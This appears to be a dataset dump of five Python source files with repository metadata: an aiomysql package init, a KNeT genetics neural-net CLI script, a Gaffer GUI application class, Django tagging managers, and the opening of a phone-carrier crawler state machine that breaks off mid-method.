| code (stringlengths 3–1.05M) | repo_name (stringlengths 5–104) | path (stringlengths 4–251) | language (stringclasses 1 value) | license (stringclasses 15 values) | size (int64 3–1.05M) |
|---|---|---|---|---|---|
"""
aiomysql: A pure-Python MySQL client library for asyncio.
Copyright (c) 2010, 2013-2014 PyMySQL contributors
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
"""
from pymysql.converters import escape_dict, escape_sequence, escape_string
from pymysql.err import (Warning, Error, InterfaceError, DataError,
DatabaseError, OperationalError, IntegrityError,
InternalError,
NotSupportedError, ProgrammingError, MySQLError)
from .connection import Connection, connect
from .cursors import Cursor, SSCursor, DictCursor, SSDictCursor
from .pool import create_pool, Pool
__version__ = '0.0.4'
__all__ = [
# Errors
'Error',
'DataError',
'DatabaseError',
'IntegrityError',
'InterfaceError',
'InternalError',
'MySQLError',
'NotSupportedError',
'OperationalError',
'ProgrammingError',
'Warning',
'escape_dict',
'escape_sequence',
'escape_string',
'__version__',
'Connection',
'Pool',
'connect',
'create_pool',
'Cursor',
'SSCursor',
'DictCursor',
'SSDictCursor'
]
(Connection, Pool, connect, create_pool, Cursor, SSCursor, DictCursor,
SSDictCursor) # pyflakes
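# ---------------------------------------------------------------------------
# Illustrative sketch, not part of the original module: a minimal query using
# the coroutine API re-exported above, assuming the usual aiomysql calling
# convention (connect(), Connection.cursor(), Cursor.execute()/fetchone()) on
# a modern Python. Host, credentials and the SQL are placeholder values; the
# helper is defined here but never called.
# ---------------------------------------------------------------------------
async def _example_query():
    conn = await connect(host='127.0.0.1', port=3306,
                         user='root', password='', db='mysql')
    cur = await conn.cursor()
    await cur.execute("SELECT 42")
    row = await cur.fetchone()   # -> (42,)
    await cur.close()
    conn.close()
    return row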
| lfblogs/aio2py | aio2py/required/aiomysql/__init__.py | Python | apache-2.0 | 2,232 |
# -*- coding: utf-8 -*-
#MIT License
#Copyright (c) 2017 Marton Kelemen
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
# Dependencies:
# numpy
# scipy
# https://docs.python.org/3/library/argparse.html
#https://docs.python.org/3/howto/argparse.html
import argparse
#from com.application.logic.knet import knet_manager
from com.application.logic.knet import knet_manager_pytorch
#from com.application.logic.knet import knet_manager_keras
import os
import gc
def set_Threads(args) :
if args.threads is not None :
os.environ['MKL_NUM_THREADS'] = args.threads  # e.g. '16'; use the number of cores available, or limit to 1
os.environ['MKL_DYNAMIC'] = 'FALSE'
os.environ['OMP_NUM_THREADS'] = '1'
print("set MKL number of threads to: " + str(args.threads))
def set_nixMem(args) :
if args.nixMem is not None :
import resource # this only exists on Unix/Linux based systems
rsrc = resource.RLIMIT_AS
soft, hard = resource.getrlimit(rsrc)
print('Soft limit starts as :', soft)
print('Hard limit starts as :', hard)
resource.setrlimit(rsrc, (args.nixMem * 1048576, hard)) #limit
soft, hard = resource.getrlimit(rsrc)
print('Soft limit changed to :', soft)
print('Hard limit changed to :', hard)
def runKnet(args) :
print('Knet Neural net started')
set_Threads(args)
set_nixMem(args)
knet_manager_pytorch.runKnet(args)
# the below will cause import errors
#if int(args.keras) == 1 : knet_manager_keras.runKnet(args)
#elif int(args.pytorch) == 1 : knet_manager_pytorch.runKnet(args)
#else : knet_manager.runKnet(args)
gc.collect()
##################################################################################################
# set up the command line parser
##################################################################################################
parser = argparse.ArgumentParser()
# overall
parser.add_argument("--out",required=True, help='an output location is always required')
parser.add_argument("--threads",required=False, help='set number of threads used by multithreaded operations')
parser.add_argument("--nixMem",required=False, type=int, help='Memory limit for *nix based systems in Megabytes')
subparsers = parser.add_subparsers()
subparsers.required = True
subparsers.dest = 'either knet, scanner, h2, kinship, kinmerge or merge' # hack to make subparser required
# create the parser for the "a" command
parser_knet = subparsers.add_parser('knet')
parser_knet.add_argument('--knet', required=True) # the location of the train set binaries
parser_knet.add_argument("--pheno", required=True)
parser_knet.set_defaults(func=runKnet)
# knet subparams
parser_knet.add_argument("--loadWeights") # from where we want to load the weights
parser_knet.add_argument("--saveWeights") # where we wnt to save weights
parser_knet.add_argument("--savFreq", default=-1, type=int) # how frequently we make backups of Weights
parser_knet.add_argument("--epochs", default=100, type=int) # how many epochs
parser_knet.add_argument("--learnRate", default=0.005, type=float)
parser_knet.add_argument("--momentum", default=-1, type=float) # -1 means 'disabled'
parser_knet.add_argument("--validSet") # the location for the binaries for the validation set
parser_knet.add_argument("--validPhen") # the location for the binaries for the validation set phenotypes
parser_knet.add_argument("--evalFreq", default=10, type=int) # how frequently we evaluate prediction accuracy (-1 for disabled)
parser_knet.add_argument("--cc", type=int) # ,required=False # if phenotype is case control
parser_knet.add_argument("--recodecc", type=int) # ,required=False # if we want to recode case control to quantitative
parser_knet.add_argument("--randomSeed", default=1, type=int)
parser_knet.add_argument("--hidCount", default=0, type=int) # number of hidden layers
parser_knet.add_argument("--hidAct", default=0, type=int) # the hidden layer activations ( 1 = sigmoid, 2 = RELU, 3 = linear, 4 = softplus, 5 = LeakyReLU, 6 =SELU)
parser_knet.add_argument("--batch_size", default=0, type=int) # the size of the minibatches, use 0 for no minibatches (IE train all at once)
parser_knet.add_argument("--bnorm", default=1, type=int) # if (spatial) batch normalization is enabled (1) or not (0)
parser_knet.add_argument("--lr_decay", default=0, type=int) # learning rate decay should be enabled (1) or not (0)
parser_knet.add_argument("--optimizer", default=0, type=int) # the optimizer, 0 for SGD (the default), 1 for ADAM, and 2 for AMSGrad
parser_knet.add_argument("--float", default=64, type=int) # the float precision, valid options are 16, 32 and 64 (the default)
parser_knet.add_argument("--inference", default=0, type=int) # if an Inference (ie deep dreaming) run is to be performed (1) or training run should be performed (0)
parser_knet.add_argument("--orig", default=0, type=int)
parser_knet.add_argument("--firstLayerSize", default=1000, type=int) # the number of units in the first layer
parser_knet.add_argument("--dropout", default=-1, type=float) # % of units to switch off at each iteration
parser_knet.add_argument("--snpIndices")
parser_knet.add_argument("--mns")
parser_knet.add_argument("--sstd")
parser_knet.add_argument("--snpIDs")
parser_knet.add_argument("--convLayers", default=0, type=int) # how many convolutional layers to add (0 for disabled)
parser_knet.add_argument("--convFilters", default=500, type=int) # the number of filters that we will use in the first layer, each subsequent layer will have i * this many filters
parser_knet.add_argument("--widthReductionRate", default=1, type=int) # The rate at which the network 'thins' IE if we start at 1000 neurons in layer 1, then at rate of 1 (default), we half it every layer, with a rate of 2, it will half every second layer Ie we will get two layers with 1000 units each, and then two 500 units etc
parser_knet.add_argument("--keras",required=False, help='to run keras/tensorflow backend (1) instead of original KNeT', default=0, type=int)
parser_knet.add_argument("--pytorch",required=False, help='to run pytorch backend (1) instead of original KNeT', default=0, type=int)
parser_knet.add_argument("--gpu",required=False, help='...', default=0, type=int)
# parser_knet.add_argument("--topology", required=True) # the location of the file that describes the network's topology (IE number and size of layers etc)
parser_knet.add_argument("--predictPheno", default=-1, type=int) # if network should save phenotype predictions to a location at the end, for a validation set
parser_knet.add_argument("--num_CPU", default=1, type=int) # the number of CPU cores Keras should use
parser_knet.add_argument("--qc", default=1, type=int) # if SNP QC is to be performed
parser_knet.add_argument("--decov", default=0.0, type=float) # if decov regularizer should be added to the penultimate layer (> 0) or not (0)
parser_knet.add_argument("--hidl2", default=0.0, type=float) # the L2 regularizer shrinkage param
parser_knet.add_argument("--l1", default=0.0, type=float) # if l1 regularizer should be added to the penultimate layer (> 0) or not (0)
parser_knet.add_argument("--ortho", default=0.0, type=float) # if ortho v1 regularizer should be added to the penultimate layer (> 0) or not (0)
parser_knet.add_argument("--orthov2", default=0.0, type=float) # if ortho v2 regularizer should be added to the penultimate layer (> 0) or not (0)
parser_knet.add_argument("--inf_neurons", default=-1, type=int) # if an inference layer should be added with a given size or not (-1)
parser_knet.add_argument("--hyperopt", default=0, type=int) # if best parameter settings are to be found via hyperopt semi-random search
parser_knet.add_argument("--earlystop", default=0, type=int) # if early stop is to be applied (1) or not (0)
parser_knet.add_argument("--linearInference", default=0, type=int) # if the activation functions should be switched off (1) for inference or not (0)
parser_knet.add_argument("--oversampling") # from where we want to load the file containing all the cases
# retrieve command line arguments
args = parser.parse_args()
args.func(args)
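# ---------------------------------------------------------------------------
# Illustrative sketch, not part of KNeT itself: the layer-width schedule that
# the --firstLayerSize / --hidCount / --widthReductionRate comments above
# describe. The helper name is hypothetical and it is never called here.
# ---------------------------------------------------------------------------
def _layer_width_schedule(first_layer_size, hid_count, width_reduction_rate):
    """Return hidden-layer widths, halving once every width_reduction_rate layers."""
    widths = []
    width = first_layer_size
    for layer_index in range(hid_count):
        widths.append(width)
        if (layer_index + 1) % width_reduction_rate == 0:
            width = max(1, width // 2)
    return widths
# _layer_width_schedule(1000, 4, 1) -> [1000, 500, 250, 125]
# _layer_width_schedule(1000, 4, 2) -> [1000, 1000, 500, 500]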
# toy test
# python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/toyregions_ --threads 2 scanner --scanner /nfs/users/nfs_m/mk23/data/gwas2/toy/wtccc2_hg19_toy --pheno /nfs/users/nfs_m/mk23/data/gwas2/toy/wtccc2_hg19_toy.pheno --saveEigSum /nfs/users/nfs_m/mk23/test/pytest/toyeig
# python /nfs/users/nfs_m/mk23/software/knet/knet.py --out /nfs/users/nfs_m/mk23/test/pytest/f1/22_s100t_ --threads 2 scanner --scanner /nfs/users/nfs_m/mk23/test/pytest/f1/22_toy_long --filterSize 100 --stride 50 --pheno /lustre/scratch115/realdata/mdt0/teams/anderson/mk23/main/folds/chroms_f1/22.pheno
##################################################################################################
##################################################################################################
# Local Tests
#
## KNET MAIN
#args = parser.parse_args(['--out', '../../../0cluster/results/knettest/chr22','knet', '--knet','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--regions', '../../../0cluster/results/knettest/regions22_', '--epochs', '10', '--learnRate', '0.00005', '--momentum', '0.9', '--validSet', '../../../0cluster/data/knettest/22_toy_long_valid' ,'--validPhen', '../../../0cluster/data/knettest/22_toy_long_valid.pheno', '--evalFreq', '10' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'
#
## Knet main as case control one hot
#args = parser.parse_args(['--out', '../../../0cluster/results/knettest/chr22','knet', '--knet','../../../0cluster/data/knettest/22_toy_long_train', '--pheno', '../../../0cluster/data/knettest/22_toy_long_train.pheno', '--regions', '../../../0cluster/results/knettest/regions22_', '--epochs', '10', '--learnRate', '0.00005', '--momentum', '0.9', '--validSet', '../../../0cluster/data/knettest/22_toy_long_valid' ,'--validPhen', '../../../0cluster/data/knettest/22_toy_long_valid.pheno', '--evalFreq', '10', '--recodecc' , '0' , '--hidCount' , '5' , '--hidl2' , '0.2' , '--hidAct' , '2' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'
#
#
# --saveWeights
# --savFreq
# LOCAL TEST
#from com.io import knet_IO
#from com.application.utils import geno_qc
#from com.application.utils import plotgen
#args = parser.parse_args(['--out', 'C:/0Datasets/knet_tempoutput/' ,'knet', '--knet', '../data/genetic/short', '--pheno', '../data/genetic/phen.pheno', '--epochs', '21', '--learnRate', '0.0001', '--momentum', '0.9', '--evalFreq', '1', '--recodecc' , '0' , '--hidCount' , '5' , '--hidl2' , '1.0' , '--hidAct' , '2' , '--cc', '0', '--saveWeights', 'C:/0Datasets/knet_tempoutput/w/', '--evalFreq', '1' , '--convFilters', '200', '--convLayers', '0', '--firstLayerSize' , '500' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'
#
#
#args = parser.parse_args(['--out', '../data/results/' ,'knet', '--knet', '../data/genetic/short', '--pheno', '../data/genetic/phen.pheno', '--oversampling', '../data/genetic/cases.txt', '--epochs', '21', '--learnRate', '0.0001', '--momentum', '0.9', '--evalFreq', '10', '--recodecc' , '0' , '--hidCount' , '5' , '--hidl2' , '1.0' , '--hidAct' , '2' , '--cc', '0' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'
#
#
#
#
#
#
#
#
# python /root/mk23/model/knet/knet3.py --out /root/mk23/results/knet_conv/ --threads 10 knet --knet /root/mk23/data/genetic/short --epochs 21 --saveWeights /root/mk23/results/knet_conv/weights/ --learnRate 0.00005 --momentum .9 --pheno /root/mk23/data/genetic/phen.pheno --recodecc 0 --cc 0 --hidAct 2 > /root/mk23/results/knet_conv.txt
# GPU run
# python /root/mk23/model/knet/knet3.py --out /root/mk23/results/knet_conv_new/ knet --knet /root/mk23/data/genetic/short --gpu 1 --epochs 1 --evalFreq 1 --saveWeights /root/mk23/results/knet_conv_new/weights/ --learnRate 0.00005 --momentum .9 --pheno /root/mk23/data/genetic/phenew.pheno.phen --recodecc 0 --cc 0 --hidAct 2 --hidl2 1.0 > /root/mk23/results/knet_conv_new.txt
# Inference on real data
#args = parser.parse_args(['--out', 'C:/0Datasets/NNs/genetic/inference/' ,'knet', '--knet', 'C:/Users/mk23/GoogleDrive_phd/PHD/Project/Implementation/data/genetic/short', '--pheno', 'C:/Users/mk23/GoogleDrive_phd/PHD/Project/Implementation/data/genetic/phenew.pheno.phen', '--epochs', '21', '--learnRate', '0.00005', '--momentum', '0.9', '--evalFreq', '1', '--recodecc' , '0' , '--hidCount' , '5' , '--hidl2' , '1.0' , '--hidAct' , '2' , '--cc', '0' ,'--inference', '1' ,'--loadWeights', 'C:/0Datasets/NNs/genetic/weights/' ,'--snpIndices', 'C:/0Datasets/NNs/genetic/nn_SNPs_indices.txt' ,'--mns', 'C:/0Datasets/NNs/genetic/data_mns','--sstd', 'C:/0Datasets/NNs/genetic/data_sstd','--snpIDs', 'C:/0Datasets/NNs/genetic/nn_SNPs.txt' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'
# GPU run on simulated data
# python /root/mk23/model/knet/knet3.py --out /root/mk23/results/knet_conv_sim/ knet --knet /root/mk23/data/genetic/simgeno_out --gpu 1 --epochs 81 --evalFreq 1 --saveWeights /root/mk23/results/knet_conv_sim/weights/ --learnRate 0.00005 --momentum .9 --pheno /root/mk23/data/genetic/simphe.phen --recodecc 0 --cc 0 --hidAct 2 --hidl2 1.0 > /root/mk23/results/knet_conv_sim.txt
# Inference on sim data
# args = parser.parse_args(['--out', 'C:/0Datasets/NNs/genetic/inference/' ,'knet', '--knet', 'C:/Users/mk23/GoogleDrive_phd/PHD/Project/Implementation/data/genetic/simgeno_out', '--pheno', 'C:/Users/mk23/GoogleDrive_phd/PHD/Project/Implementation/data/genetic/simphe.phen', '--epochs', '21', '--learnRate', '0.00005', '--momentum', '0.9', '--evalFreq', '1', '--recodecc' , '0' , '--hidCount' , '5' , '--hidl2' , '1.0' , '--hidAct' , '2' , '--cc', '0' ,'--inference', '1' ,'--loadWeights', 'C:/0Datasets/NNs/genetic/weights/' ,'--snpIndices', 'C:/0Datasets/NNs/genetic/nn_SNPs_indices.txt' ,'--mns', 'C:/0Datasets/NNs/genetic/data_mns','--sstd', 'C:/0Datasets/NNs/genetic/data_sstd','--snpIDs', 'C:/0Datasets/NNs/genetic/nn_SNPs.txt' ]) # , '--loadEigSum', '../../../0cluster/data/data/toy/eig/'
# GPU run on simulated data with simulated validation data
# python /root/mk23/model/knet/knet3.py --out /root/mk23/results/knet_conv_sim_val/ knet --knet /root/mk23/data/genetic/train_data --gpu 1 --epochs 501 --evalFreq 1 --saveWeights /root/mk23/results/knet_conv_sim_val/weights/ --learnRate 0.00001 --momentum .9 --pheno /root/mk23/data/genetic/simphe_2x_train.phen --validSet /root/mk23/data/genetic/test_data --validPhen /root/mk23/data/genetic/simphe_2x_test.phen --recodecc 0 --cc 0 --hidAct 2 --hidl2 1.0 --randomSeed 42 > /root/mk23/results/knet_conv_sim_val.txt
# GPU run on simulated data with simulated validation data, that has only 5200 SNPs
# python /root/mk23/model/knet/knet3.py --out /root/mk23/results/knet_conv_sim_val_5200/ knet --knet /root/mk23/data/genetic/train_data_5200 --gpu 1 --epochs 101 --evalFreq 1 --saveWeights /root/mk23/results/knet_conv_sim_val_5200/weights/ --learnRate 0.001 --momentum .9 --pheno /root/mk23/data/genetic/simphe_2x_train_5200.phen --validSet /root/mk23/data/genetic/test_data_5200 --validPhen /root/mk23/data/genetic/simphe_2x_test_5200.phen --recodecc 0 --cc 0 --hidAct 2 --hidl2 1.00 --randomSeed 42 > /root/mk23/results/knet_conv_sim_val_5200.txt
# GPU run on simulated data with simulated validation data, that has only 5200 SNPs, where 50% is causal, IE massively polygenic
# python /root/mk23/model/knet/knet3.py --out /root/mk23/results/knet_conv_sim_val_5200_MP/ knet --knet /root/mk23/data/genetic/train_data_5200 --gpu 1 --epochs 101 --evalFreq 1 --saveWeights /root/mk23/results/knet_conv_sim_val_5200_MP/weights/ --learnRate 0.0005 --momentum .9 --pheno /root/mk23/data/genetic/simphe_2x_train_5200_MP.phen --validSet /root/mk23/data/genetic/test_data_5200 --validPhen /root/mk23/data/genetic/simphe_2x_test_5200_MP.phen --recodecc 0 --cc 0 --hidAct 2 --hidl2 1.0 --randomSeed 42 > /root/mk23/results/knet_conv_sim_val_5200_MP.txt
# This produces a 7% r^2
# python /root/mk23/model/knet/knet3.py --out /root/mk23/results/knet_conv_sim_val_5200_MP/ knet --knet /root/mk23/data/genetic/train_data_5200 --gpu 1 --epochs 101 --evalFreq 1 --saveWeights /root/mk23/results/knet_conv_sim_val_5200_MP/weights/ --learnRate 0.0005 --momentum .9 --pheno /root/mk23/data/genetic/simphe_2x_train_5200_MP.phen --validSet /root/mk23/data/genetic/test_data_5200 --validPhen /root/mk23/data/genetic/simphe_2x_test_5200_MP.phen --recodecc 0 --cc 0 --hidAct 3 --hidl2 0.5 --randomSeed 42 > /root/mk23/results/knet_conv_sim_val_5200_MP.txt
#
#from com.application.logic.knet import knet_main
#from com.application.utils import plotgen
#from com.application.utils import geno_qc
#from com.io import knet_IO
#from com.application.utils. geno_qc import removeList, genoQC_all, standardise_Genotypes, getSizeInMBs
#
#import importlib
#from types import ModuleType
## recursively reload modules / submodules up until a certain depth ( if 2 deep it will crash or try to reload static/built in modules)
#def rreload(module, maxDepth = 2, depth = 0):
# importlib.reload(module)
# depth = depth +1
# if(depth < maxDepth) :
# for attribute_name in dir(module):
# attribute = getattr(module, attribute_name)
# if type(attribute) is ModuleType:
# rreload(attribute, maxDepth, depth)
#
#
#rreload(knet_IO)
#rreload(geno_qc)
#rreload(knet_main)
#
#
##
#import importlib
#importlib.reload(geno_qc)
#
# sometimes reloading modules will fail... only solution is to restart kernel:
# http://justus.science/blog/2015/04/19/sys.modules-is-dangerous.html
| mkelcb/knet | knet/knet_pytorch.py | Python | mit | 19,243 |
##########################################################################
#
# Copyright (c) 2011-2012, John Haddon. All rights reserved.
# Copyright (c) 2011-2013, Image Engine Design Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above
# copyright notice, this list of conditions and the following
# disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided with
# the distribution.
#
# * Neither the name of John Haddon nor the names of
# any other contributors to this software may be used to endorse or
# promote products derived from this software without specific prior
# written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
# IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
# CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
# EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
# PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
# LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
# NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
##########################################################################
import os
import gc
import functools
import IECore
import Gaffer
import GafferUI
class gui( Gaffer.Application ) :
def __init__( self ) :
Gaffer.Application.__init__(
self,
"""
A graphical user interface for editing node graphs. This is
the primary user facing Gaffer application.
"""
)
self.parameters().addParameters(
[
IECore.StringVectorParameter(
name = "scripts",
description = "A list of scripts to edit.",
defaultValue = IECore.StringVectorData(),
),
IECore.BoolParameter(
name = "fullScreen",
description = "Opens the UI in full screen mode.",
defaultValue = False,
),
]
)
self.parameters().userData()["parser"] = IECore.CompoundObject(
{
"flagless" : IECore.StringVectorData( [ "scripts" ] )
}
)
self.__setupClipboardSync()
def _run( self, args ) :
GafferUI.ScriptWindow.connect( self.root() )
# Must start the event loop before adding scripts,
# because `FileMenu.addScript()` may launch
# interactive dialogues.
GafferUI.EventLoop.addIdleCallback( functools.partial( self.__addScripts, args ) )
GafferUI.EventLoop.mainEventLoop().start()
return 0
def __addScripts( self, args ) :
if len( args["scripts"] ) :
for fileName in args["scripts"] :
GafferUI.FileMenu.addScript( self.root(), fileName )
if not len( self.root()["scripts"] ) :
# Loading was cancelled, in which case we should quit the app.
GafferUI.EventLoop.mainEventLoop().stop()
return False # Remove idle callback
else :
scriptNode = Gaffer.ScriptNode()
Gaffer.NodeAlgo.applyUserDefaults( scriptNode )
self.root()["scripts"].addChild( scriptNode )
if args["fullScreen"].value :
primaryScript = self.root()["scripts"][-1]
primaryWindow = GafferUI.ScriptWindow.acquire( primaryScript )
primaryWindow.setFullScreen( True )
return False # Remove idle callback
def __setupClipboardSync( self ) :
## This function sets up two way syncing between the clipboard held in the Gaffer::ApplicationRoot
# and the global QtGui.QClipboard which is shared with external applications, and used by the cut and paste
# operations in GafferUI's underlying QWidgets. This is very useful, as it allows nodes to be copied from
# the graph and pasted into emails/chats etc, and then copied out of emails/chats and pasted into the node graph.
#
## \todo I don't think this is the ideal place for this functionality. Firstly, we need it in all apps
# rather than just the gui app. Secondly, we want a way of using the global clipboard using GafferUI
# public functions without needing an ApplicationRoot. Thirdly, it's questionable that ApplicationRoot should
# have a clipboard anyway - it seems like a violation of separation between the gui and non-gui libraries.
# Perhaps we should abolish the ApplicationRoot clipboard and the ScriptNode cut/copy/paste routines, relegating
# them all to GafferUI functionality?
from Qt import QtWidgets
self.__clipboardContentsChangedConnection = self.root().clipboardContentsChangedSignal().connect( Gaffer.WeakMethod( self.__clipboardContentsChanged ) )
QtWidgets.QApplication.clipboard().dataChanged.connect( Gaffer.WeakMethod( self.__qtClipboardContentsChanged ) )
self.__ignoreQtClipboardContentsChanged = False
self.__qtClipboardContentsChanged() # Trigger initial sync
def __clipboardContentsChanged( self, applicationRoot ) :
assert( applicationRoot.isSame( self.root() ) )
data = applicationRoot.getClipboardContents()
from Qt import QtWidgets
clipboard = QtWidgets.QApplication.clipboard()
try :
self.__ignoreQtClipboardContentsChanged = True # avoid triggering an unnecessary copy back in __qtClipboardContentsChanged
clipboard.setText( str( data ) )
finally :
self.__ignoreQtClipboardContentsChanged = False
def __qtClipboardContentsChanged( self ) :
if self.__ignoreQtClipboardContentsChanged :
return
from Qt import QtWidgets
text = QtWidgets.QApplication.clipboard().text().encode( "utf-8" )
if text :
with Gaffer.BlockedConnection( self.__clipboardContentsChangedConnection ) :
self.root().setClipboardContents( IECore.StringData( text ) )
IECore.registerRunTimeTyped( gui )
| andrewkaufman/gaffer | apps/gui/gui-1.py | Python | bsd-3-clause | 6,109 |
"""
Custom managers for Django models registered with the tagging
application.
"""
from django.contrib.contenttypes.models import ContentType
from django.db import models
class ModelTagManager(models.Manager):
"""
A manager for retrieving tags for a particular model.
"""
def __init__(self, tag_model):
super(ModelTagManager, self).__init__()
self.tag_model = tag_model
def get_query_set(self):
content_type = ContentType.objects.get_for_model(self.model)
return self.tag_model.objects.filter(
items__content_type__pk=content_type.pk).distinct()
def related(self, tags, *args, **kwargs):
return self.tag_model.objects.related_for_model(tags, self.model, *args, **kwargs)
def usage(self, *args, **kwargs):
return self.tag_model.objects.usage_for_model(self.model, *args, **kwargs)
class ModelTaggedItemManager(models.Manager):
"""
A manager for retrieving model instances based on their tags.
"""
def __init__(self, tag_model):
super(ModelTaggedItemManager, self).__init__()
self.intermediary_table_model = tag_model.objects.intermediary_table_model
def related_to(self, obj, queryset=None, num=None):
if queryset is None:
return self.intermediary_table_model.objects.get_related(obj, self.model, num=num)
else:
return self.intermediary_table_model.objects.get_related(obj, queryset, num=num)
def with_all(self, tags, queryset=None):
if queryset is None:
return self.intermediary_table_model.objects.get_by_model(self.model, tags)
else:
return self.intermediary_table_model.objects.get_by_model(queryset, tags)
def with_any(self, tags, queryset=None):
if queryset is None:
return self.intermediary_table_model.objects.get_union_by_model(self.model, tags)
else:
return self.intermediary_table_model.objects.get_union_by_model(queryset, tags)
class TagDescriptor(object):
"""
A descriptor which provides access to a ``ModelTagManager`` for
model classes and simple retrieval, updating and deletion of tags
for model instances.
"""
def __init__(self, tag_model):
self.tag_model = tag_model
def __get__(self, instance, owner):
if not instance:
tag_manager = ModelTagManager(self.tag_model)
tag_manager.model = owner
return tag_manager
else:
return self.tag_model.objects.get_for_object(instance)
def __set__(self, instance, value):
self.tag_model.objects.update_tags(instance, value)
def __delete__(self, instance):  # descriptor deletion hook; __del__ is the finalizer and does not take an instance argument
self.tag_model.objects.update_tags(instance, [])
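# ---------------------------------------------------------------------------
# Illustrative sketch, not part of this module: how a project might attach the
# descriptor to one of its models. "Tag" stands for whatever tag model the
# project registered with newtagging, and "Bookmark" is a hypothetical model,
# so the example is left commented out.
# ---------------------------------------------------------------------------
# from myapp.models import Tag              # hypothetical tag model
#
# class Bookmark(models.Model):
#     url = models.URLField()
#     tags = TagDescriptor(Tag)
#
# Class access (Bookmark.tags) returns a ModelTagManager bound to Bookmark;
# instance access (bookmark.tags) returns the tags for that object; assigning
# to it calls update_tags(), and deleting it clears the tags.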
| mstepniowski/django-newtagging | newtagging/managers.py | Python | mit | 2,765 |
# -*- coding: utf-8 -*-
import sys
import time
import inspect
import traceback
from base_state import BaseState
from state_tool import after_get_parameter, SUCCESS_STATUS, FAILED_STATUS
from setting.status_code import STATUS_CODE
from setting.api_config import ENV, STATE_TIME_OUT, CRAWLER_TIME_OUT
from worker.communicate import get_parameter, save_data, save_status, get_today_result
from worker.call_log_data_fusion import data_fusion as call_log_fusion
from worker.bill_data_fusion import data_fusion as bill_fusion
import copy
class StartState(BaseState):
def __init__(self, **kwargs):
super(StartState, self).__init__(**kwargs)
self.parameters['tel'] = kwargs['tel']
self.login_verify_type = \
self.crawler.get_login_verify_type(**self.parameters)
self.need_parameters = \
self.crawler.need_parameters(**self.parameters)
need_parameters_dict = {'need_full_name': 0,
'need_id_card': 0,
'need_pin_pwd': 0,
'need_sms_verify': 0,
'need_captcha_verify': 0}
for parameter in self.need_parameters:
need_parameters_dict['need_{}'.format(parameter)] = 1
self.need_parameters = need_parameters_dict
self.cache_time = get_today_result(self.parameters['tel'])
self.set_current_state(receive=True)
def execute(self, **kwargs):
status = STATUS_CODE[SUCCESS_STATUS]
self.execute_message = status['message']
self.execute_status = status['status']
if not self.login_verify_type:
self.state_flag = 'WaitLogin'
else:
self.state_flag = 'WaitLoginVerifyRequest'
self.log()
class WaitLoginVerifyRequestState(BaseState):
def __init__(self, **kwargs):
super(WaitLoginVerifyRequestState, self).__init__(**kwargs)
self.next_action = 'Get{}'.format(self.login_verify_type)
self.set_current_state()
def execute(self, **kwargs):
targets = [self.next_action]
parameter_status, parameter_timeout, action, parameters = \
get_parameter(state=self, targets=targets)
status_code, state_flag = after_get_parameter(parameter_status,
parameter_timeout,
action)
self.parameters.update(parameters)
if not state_flag:
self.state_flag = 'UnderLoginVerifyRequest'
else:
